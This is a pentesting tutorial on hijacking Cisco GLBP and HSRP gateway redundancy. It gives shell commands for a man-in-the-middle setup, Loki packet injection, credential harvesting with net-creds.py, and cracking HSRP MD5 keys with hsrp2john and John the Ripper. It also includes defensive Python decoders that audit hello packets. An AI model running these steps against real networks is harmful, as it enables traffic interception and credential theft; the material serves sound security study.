carlospolop 1fa9f77ec3 change
2023-04-05 14:02:54 +02:00


GLBP & HSRP Attacks

HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

This page was copied from https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9

FHRP Hijacking

What is FHRP?

FHRP (First Hop Redundancy Protocol) is a class of network protocols designed to create a hot redundant routing system. With FHRP, physical routers can be combined into a single logical device, which increases fault tolerance and helps distribute the load.

Cisco Systems engineers have developed two FHRP protocols, GLBP and HSRP, which I will demonstrate next.

GLBP Protocol

Developed by Cisco Systems engineers. Like HSRP, this protocol is implemented on top of the TCP/IP protocol stack, which is why the UDP transport layer protocol on port 3222 is used to carry service information. GLBP routers within the same logical group exchange special “hello” packets every 3 seconds; if a GLBP router has not received a hello packet from a neighbor in the same group within 10 seconds, it marks that neighbor as “dead”. The timer values can be configured according to the administrator's needs.

The skeleton and mechanics of GLBP

GLBP provides load sharing to multiple routers (gateways) using one virtual IP address and multiple virtual MAC addresses. Each host is configured with the same virtual IP address and all routers in the virtual group participate in packet transmission.

It works quite differently from HSRP and VRRP because it uses true load balancing mechanisms, which I describe below:

Host-Dependent. A type of load balancing used on networks where NAT is in use. Host-Dependent guarantees that a host always gets back the same AVF MAC address it was given earlier, so the NAT state for that host is not broken.

Round-Robin. In this mode, the AVG device distributes MAC addresses to AVF members alternately. This is the mechanism used by default.

Weight-based round-robin. Load balancing based on a special “Weight” metric.

Roles in the GLBP domain & Terminology

AVG (Active Virtual Gateway) — the router with the leading role is also responsible for distributing MAC addresses to other routers within the same GLBP group. A kind of “boss” in the GLBP domain. AVG tells the other routers how to distribute traffic by handing out MAC addresses when an ARP request arrives. It is worth noting that there can only be one AVG router in a GLBP domain, but it can also be an AVF member.

AVF (Active Virtual Forwarder) — a router in a GLBP group handling traffic in the network.

GLBP Priority — The priority value that determines which router in the GLBP group will be the AVG. The default value is 100 (the priority range can be from 1 to 255). It can be set manually, i.e. the network engineer himself determines which router will be the “superior” and which will be the “slave”. The higher the priority, the more likely the router will get the AVG role. Usually the AVG role is given to more powerful routers.

GLBP Weight — The value of the so-called GLBP Weight of a router in a GLBP group. GLBP Weight defines the load level of the router. This value is “floating” and can vary depending on the load on the physical channel (the Object Tracking mechanism is involved), but it can also be configured manually.

GLBP Virtual IP Address — the virtual IP address in the GLBP domain. Used as the default gateway address for legitimate hosts.

GLBP uses the reserved group mailing IP address 224.0.0.102 and the UDP transport layer protocol port number 3222 to send and process service information. Special GLBP Hello packets are sent every 3 seconds. If the GLBP router has not received a hello packet from a neighbor within 10 seconds, the neighbor will be considered “dead” and will drop out of the GLBP domain.

GLBP Attack Mechanism

The technique of this network attack is to impose your device as the main router by injecting a malicious GLBP packet with a maximum priority value. Successful exploitation leads to a DoS or MITM attack in which you can intercept traffic within the network, conduct a redirect, or cause a DoS as you take over the role of AVG router. All you have to do is build a GLBP packet with the highest priority value of 255 and direct it towards the local network.

GLBP Injection (Loki)

To demonstrate this attack, I will use Loki. It will perform a malicious GLBP injection with a maximum priority value of 255 and a maximum weight value of 255. But before performing the attack, the following information needs to be examined:

  • The virtual IP address used in the GLBP domain
  • Whether authentication is used
  • Value of router priorities

We will be able to extract this information by analyzing GLBP traffic. We will use Wireshark.

As we see, only two routers are involved in the GLBP process: 10.10.100.100 and 10.10.100.200.

GLBP Ads

GLBP Advertisement from first router

After analyzing GLBP traffic we have the following:

  • A misconfiguration was detected in the priority setting. The AVG is a GLBP router with priority 200, i.e. we have a vector for GLBP hijacking
  • No authentication
  • The virtual IP address used in the GLBP domain is 10.10.100.254
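The three items above are what a capture of GLBP hellos has to give you, and they are just as useful to the defender auditing a segment as to the tester. As an added example (it is not part of the original article, nor code from Loki or Wireshark), here is a small Python decoder for GLBP datagrams that reports the virtual IP, the AVG priority and whether an authentication TLV is present. GLBP itself is undocumented: the field offsets and the state/authentication-type names are assumed from the public Wireshark dissector, and the two sample datagrams are constructed to mirror the capture on this page (group 1, priority 200, virtual IP 10.10.100.254, no authentication; then the same hello with priority 255 and an MD5 authentication TLV).

```python
import ipaddress
import struct

# GLBP service traffic is UDP/3222 to 224.0.0.102 (as stated on the page).
# GLBP is undocumented: the offsets below are assumed from the public
# Wireshark dissector, and the "_u*" values are bytes it also leaves unnamed.
GLBP_PORT = 3222
GLBP_MCAST = "224.0.0.102"
TLV_HELLO, TLV_REQRESP, TLV_AUTH = 1, 2, 3
STATES = {0: "Disabled", 1: "Initial", 4: "Listen", 8: "Speak", 16: "Standby", 32: "Active"}
AUTH_TYPES = {1: "plain text", 2: "MD5 string", 3: "MD5 chain"}  # assumed names


def _mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_glbp(payload: bytes) -> dict:
    """Decode one GLBP datagram (the UDP payload) into header fields and TLVs."""
    if len(payload) < 12:
        raise ValueError("GLBP header is 12 bytes")
    version, _u1, group, _u2 = struct.unpack("!BBHH", payload[:6])
    msg = {"version": version, "group": group, "owner_mac": _mac(payload[6:12]),
           "hello": None, "forwarders": [], "auth": None}
    off = 12
    while off + 2 <= len(payload):
        tlv_type, tlv_len = payload[off], payload[off + 1]  # length includes these 2 bytes
        if tlv_len < 2 or off + tlv_len > len(payload):
            raise ValueError(f"bad TLV length {tlv_len} at offset {off}")
        body = payload[off + 2:off + tlv_len]
        if tlv_type == TLV_HELLO and len(body) >= 22:
            (_u3, vg_state, _u4, priority, _u5, hello_ms, hold_ms, redirect_s,
             timeout_s, _u6, addr_type, addr_len) = struct.unpack("!BBBBHIIHHHBB", body[:22])
            addr = body[22:22 + addr_len]
            vip = str(ipaddress.IPv4Address(addr)) if (addr_type, addr_len) == (1, 4) else addr.hex()
            msg["hello"] = {"vg_state": STATES.get(vg_state, f"unknown({vg_state})"),
                            "priority": priority, "hello_ms": hello_ms, "hold_ms": hold_ms,
                            "redirect_s": redirect_s, "timeout_s": timeout_s, "virtual_ip": vip}
        elif tlv_type == TLV_REQRESP and len(body) >= 18:
            fwd, vf_state, _u7, priority, weight = struct.unpack("!5B", body[:5])
            msg["forwarders"].append({"forwarder": fwd,
                                      "vf_state": STATES.get(vf_state, f"unknown({vf_state})"),
                                      "priority": priority, "weight": weight,
                                      "virtual_mac": _mac(body[12:18])})
        elif tlv_type == TLV_AUTH and len(body) >= 2:
            auth_type, auth_len = body[0], body[1]
            msg["auth"] = {"type": AUTH_TYPES.get(auth_type, f"unknown({auth_type})"),
                           "value": body[2:2 + auth_len]}
        off += tlv_len
    return msg


def audit_glbp(msg: dict) -> list:
    """Flag the two weaknesses the page looks for: no authentication, and an AVG
    whose priority leaves room for a higher-priority claimant."""
    findings = []
    hello = msg["hello"]
    if hello is None:
        return ["no Hello TLV: not a GLBP hello"]
    if msg["auth"] is None:
        findings.append("no authentication TLV: any host on the segment can join the group")
    elif msg["auth"]["type"] == "plain text":
        findings.append("plain-text authentication: the key is readable in every hello")
    if hello["vg_state"] == "Active" and hello["priority"] < 255:
        findings.append(f"AVG advertises priority {hello['priority']} (< 255): "
                        "a higher value wins the AVG role")
    return findings


# Constructed sample: hello from the AVG of group 1 (Active, priority 200, hello 3000 ms,
# hold 10000 ms, virtual IP 10.10.100.254), its forwarder entry, and no auth TLV.
SAMPLE_NO_AUTH = bytes.fromhex(
    "0100 0001 0000 001e13abcd01"                                              # header
    "011c 00 20 00 c8 0000 00000bb8 00002710 0258 3840 0000 01 04 0a0a64fe"   # Hello TLV
    "0214 01 20 00 a7 64 00000000000000 0007b4000101"                          # Req/Resp TLV
)
# Constructed sample: same group, priority 255, plus an "MD5 string" auth TLV (dummy digest).
SAMPLE_MD5_AUTH = bytes.fromhex(
    "0100 0001 0000 001e13abcd01"
    "011c 00 20 00 ff 0000 00000bb8 00002710 0258 3840 0000 01 04 0a0a64fe"
    "0214 01 20 00 a7 64 00000000000000 0007b4000101"
    "0314 02 10 00112233445566778899aabbccddeeff"
)

if __name__ == "__main__":
    for name, pkt in (("no-auth", SAMPLE_NO_AUTH), ("md5-auth", SAMPLE_MD5_AUTH)):
        decoded = parse_glbp(pkt)
        print(name, decoded["hello"], decoded["auth"] and decoded["auth"]["type"])
        print("  findings:", audit_glbp(decoded) or "none")
```

Fed the UDP payloads of port-3222 datagrams from a capture (for example with a pcap reader), `audit_glbp` reproduces the assessment made from the screenshots above: the first sample yields both findings, the second yields none.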

With this information, we can easily attack GLBP.

Loki found GLBP ads from two routers

Before the attack, switch to promiscuous mode and allow traffic routing:

~$ sudo ip link set eth0 promisc on
~$ sudo sysctl -w net.ipv4.ip_forward=1

Select the router at IP address 10.10.100.100 and activate the Get IP option. You also need to generate a Gratuitous ARP.

The structure of a malicious GLBP injection

As you can see, the AVG router is now the attacking system. The priority value is 255 and the weight value is 255, i.e. the maximum.

After performing the injection we need to create a secondary IP address on our network interface with the value of the virtual IP address in the GLBP domain. You also need to set a 24-bit mask.

This way legitimate traffic will be looped back to us, because the virtual IP address used in the GLBP domain is the default gateway address for hosts:

~$ sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0

To see not only incoming traffic but also outgoing traffic, we need a small rule for SNAT (masquerading):

~$ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

We also need to remove the default route on our machine and write a new one which will go through the former AVG router (address is 10.10.100.100). Even though we have hijacked the AVG role from the router, it will still be able to route traffic.

~$ sudo route del default
~$ sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100

That's it, we are now the “man in the middle”! I will run the tool net-creds.py to analyze the traffic and look for important data, for example unencrypted FTP traffic or NTLM hashes.

~$ sudo python2 net-creds.py -i eth0

After running the utility, I will try to read the SMB share with the IP address 172.16.100.70, which is behind the GLBP routers.

user@Boundless:~$ smbclient -L \\172.16.100.70 --user mercy

This is how you can intercept traffic within the network by attacking GLBP domains.

HSRP Hijacking

HSRP (Hot Standby Router/Redundancy Protocol) is a Cisco proprietary protocol that allows for network gateway redundancy. The general idea is to combine several physical routers into one logical router with a common IP address. This address of the virtual router will be assigned to the interface of the router with the master role, and the latter, in its turn, will take care of traffic forwarding. In the HSRP domain, the task of handling all traffic falls precisely on the router with the primary role, unlike GLBP, where load balancing by using special metrics (priority and weight) was proposed.

Roles in the HSRP domain & terminology

HSRP Active Router — a device that acts as a virtual router and provides forwarding of traffic from source networks to destination networks.
HSRP Standby Router — a device that acts as a standby router, waiting for the active router to fail. When the primary Active router fails, the Standby router will take over the primary role and take over the duties of the Active router.
HSRP Group — a group of devices that ensures the operation and fault tolerance of a logical router.
HSRP MAC Address — the virtual MAC address of the logical router in the HSRP domain.
HSRP Virtual IP Address — This is a special virtual IP address in the HSRP group. This IP address will be the default gateway for the end hosts, used on the logical router itself.

HSRP protocol versions

The HSRP protocol has two versions — HSRPv1 and HSRPv2. They differ in the following parameters:

  • The number of possible logical groups. HSRPv1 can have up to 255 groups. HSRPv2 can have up to 4096 groups
  • Multicast IP address. HSRPv1 uses IP address 224.0.0.2 to send service information, and HSRPv2 uses 224.0.0.102
  • Virtual MAC address. HSRPv1 uses 00:00:0C:07:AC:XX as its virtual MAC address. HSRPv2 has a virtual MAC address of 00:00:0C:9F:FX:XX (where XX is the HSRP group number)

HSRP uses the reserved IP address 224.0.0.2 or 224.0.0.102 (depending on the HSRP version) and the UDP transport layer protocol with port number 1985 to broadcast and process the service information. Special HSRP Hello packets are sent every 3 seconds. If the HSRP router does not receive a hello packet from a neighbor within 10 seconds, the neighbor will be considered “dead” and will drop out of the HSRP domain.

HSRP Attack Mechanism

This is exactly the same as GLBP Hijacking. We need to perform a malicious HSRP injection with a maximum priority value of 255. This allows us to hijack the role of the Active router, opening the door to a MITM attack. But again, we need to examine the following information before conducting the attack:

  • The virtual IP address used in the HSRP domain
  • The presence of authentication
  • Value of router priorities

We can extract this information by analyzing HSRP traffic. Let's use Wireshark.

As you can see in the screenshot, the HSRP process involves only two routers, with addresses 10.10.100.100 and 10.10.100.200.

HSRP Ads

First HSRP router

Second HSRP router

Based on the analysis of HSRP traffic, we have the following:

  • A misconfiguration was detected in the priority setting. The Active router is an HSRP router with priority 200, that is, we have a vector for HSRP hijacking
  • The virtual IP address used in the HSRP domain is 10.10.100.254
  • MD5 authentication is used
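The same three items can be read straight out of HSRPv1 hellos, including whether the authentication is the 8-byte plaintext field of RFC 2281 or Cisco's MD5 extension. As an added example (not part of the original article, nor code from Loki, Wireshark or hsrp2john), here is a Python decoder for HSRPv1 datagrams with an audit that flags the plaintext default and an Active router advertising less than the maximum priority. The fixed 20-byte header follows RFC 2281; the layout of the MD5 TLV (type 4, length 28, giving a 50-byte datagram) is assumed from the public Wireshark dissector; the sample datagrams are constructed to mirror this page's capture (priority 200, group 1, virtual IP 10.10.100.254), with a dummy digest and source 10.10.100.100 for the MD5 variant. HSRPv2 uses a different TLV layout and is deliberately rejected rather than guessed.

```python
import ipaddress
import struct

# HSRPv1 (RFC 2281): fixed 20-byte header on UDP/1985 to 224.0.0.2. Cisco appends a
# type-4 TLV (28 bytes, layout assumed from the Wireshark dissector) for MD5 auth.
HSRP_PORT = 1985
OPCODES = {0: "Hello", 1: "Coup", 2: "Resign"}
STATES = {0: "Initial", 1: "Learn", 2: "Listen", 4: "Speak", 8: "Standby", 16: "Active"}
MD5_TLV_TYPE = 4
DEFAULT_AUTH = b"cisco\x00\x00\x00"   # RFC 2281 default authentication data


def parse_hsrp_v1(payload: bytes) -> dict:
    """Decode one HSRPv1 datagram (the UDP payload); reject anything else."""
    if len(payload) < 20:
        raise ValueError("HSRPv1 header is 20 bytes")
    version, opcode, state, hello_s, hold_s, priority, group, _rsv = struct.unpack("!8B", payload[:8])
    if version != 0:
        raise ValueError(f"version byte {version}: not HSRPv1 (v2 uses a TLV layout not handled here)")
    auth_field = payload[8:16]
    msg = {
        "opcode": OPCODES.get(opcode, f"unknown({opcode})"),
        "state": STATES.get(state, f"unknown({state})"),
        "hello_s": hello_s, "hold_s": hold_s, "priority": priority, "group": group,
        "auth_mode": "plaintext",
        "auth_text": auth_field.rstrip(b"\x00").decode("ascii", "replace"),
        "virtual_ip": str(ipaddress.IPv4Address(payload[16:20])),
    }
    off = 20
    while off + 2 <= len(payload):
        tlv_type, tlv_len = payload[off], payload[off + 1]   # length excludes these 2 bytes
        body = payload[off + 2:off + 2 + tlv_len]
        if tlv_type == MD5_TLV_TYPE and len(body) == 28:
            algorithm, _pad, flags = struct.unpack("!BBH", body[:4])
            msg["auth_mode"] = "md5"
            msg["md5"] = {"algorithm": algorithm, "flags": flags,
                          "source_ip": str(ipaddress.IPv4Address(body[4:8])),
                          "key_id": struct.unpack("!I", body[8:12])[0],
                          "digest": body[12:28].hex()}
        off += 2 + tlv_len
    return msg


def audit_hsrp(msg: dict) -> list:
    """Flag what the page checks before an attack: auth strength and Active priority."""
    findings = []
    if msg["auth_mode"] != "md5":
        how = "the default 'cisco' string" if msg["auth_text"] == "cisco" else "a plain-text string"
        findings.append(f"no MD5 authentication: the 8-byte field carries {how}, "
                        "readable by any host on the segment")
    if msg["state"] == "Active" and msg["priority"] < 255:
        findings.append(f"Active router advertises priority {msg['priority']} (< 255): "
                        "a higher value wins the Active role")
    if msg["opcode"] == "Coup":
        findings.append("Coup message: a router is claiming the Active role; confirm the sender is an expected gateway")
    return findings


# Constructed sample: v1 Hello, Active, hello 3 s, hold 10 s, priority 200, group 1,
# default plaintext auth "cisco", virtual IP 10.10.100.254.
SAMPLE_PLAIN = bytes.fromhex("00 00 10 03 0a c8 01 00" "636973636f000000" "0a0a64fe")
# Constructed sample: the same hello plus an MD5 TLV (source 10.10.100.100, key id 0,
# dummy 16-byte digest), i.e. the 50-byte form that hsrp2john.py expects.
SAMPLE_MD5 = SAMPLE_PLAIN + bytes.fromhex(
    "04 1c 01 00 0000 0a0a6464 00000000 00112233445566778899aabbccddeeff")

if __name__ == "__main__":
    for name, pkt in (("plaintext", SAMPLE_PLAIN), ("md5", SAMPLE_MD5)):
        decoded = parse_hsrp_v1(pkt)
        print(name, decoded["state"], decoded["priority"], decoded["virtual_ip"], decoded["auth_mode"])
        print("  findings:", audit_hsrp(decoded) or "none")
```

On this page's capture the decoder reports MD5 authentication and an Active priority of 200, so only the priority finding remains; the plaintext sample produces both. The code only recognises the MD5 TLV, it does not verify or recover the digest.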

Having authentication in the domain ties our hands, but I will fix that.

HSRP Authentication Bypassing

Save the HSRP traffic dump in .pcap format so that the extractor can correctly pull the MD5 hashes out of the dump. I will use hsrp2john.py as the extractor:

~/cisconightmare/exfiltrate$ python2 hsrp2john.py hsrp_with_authentication.pcap

Extracted MD5 hashes from HSRP traffic dump

I will crack the hashes with John the Ripper, specifying the hashes themselves as input and the path to the dictionary with the --wordlist switch:

~/cisconightmare/exfiltrate$ john hsrp_hashes --wordlist=wordlistforbrute

Cracked HSRP domain password

As a result, we have a key to enter the HSRP domain — endgame.

HSRP Injection (Loki)

I will use the same Loki to attack the HSRP protocol. Among other things, it has a key injection feature, which helps us bypass authentication. Earlier, in the HSRP Hijacking section, we obtained all the necessary information about the HSRP domain.

Starting Loki.

Loki detected HSRP ads

Don't forget to switch to promiscuous mode and allow traffic routing before conducting the attack:

~$ sudo ip link set eth0 promisc on
~$ sudo sysctl -w net.ipv4.ip_forward=1

Select the router with an address of 10.10.100.100 and a priority of 200. As the Secret parameter, enter the cracked password from the HSRP domain, generate a Gratuitous ARP and select the Get IP option.

As we can see, the Active router is now our attacking system. The priority value is 255.

After the injection we need to create a secondary IP address on our network interface with the value of the virtual IP address in the HSRP domain. You should also specify a 24-bit mask. In this way, legitimate traffic will be looped back to us, because the virtual IP address used in the HSRP domain is the default gateway address for hosts.

~$ sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0

We set up the well-known Source NAT (masquerading) to intercept all traffic:

~$ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

We remove the default route on our machine and write a new one which will go through the former Active router (its address is 10.10.100.100). Even though we have hijacked the active role from the router, it will still be able to route traffic.

~$ sudo route del default
~$ sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100

Now we are the “man in the middle”. Let's run net-creds.py:

~$ sudo python2 net-creds.py -i eth0

After running the utility, I will reproduce an attempt to authenticate to the FTP server at 172.16.100.140:

~$ ftp 172.16.100.140

As a result, we get the creds from the FTP server: insomnia:betrayal

This is how you can attack the HSRP domain and intercept traffic. Basically, everything is similar to GLBP.
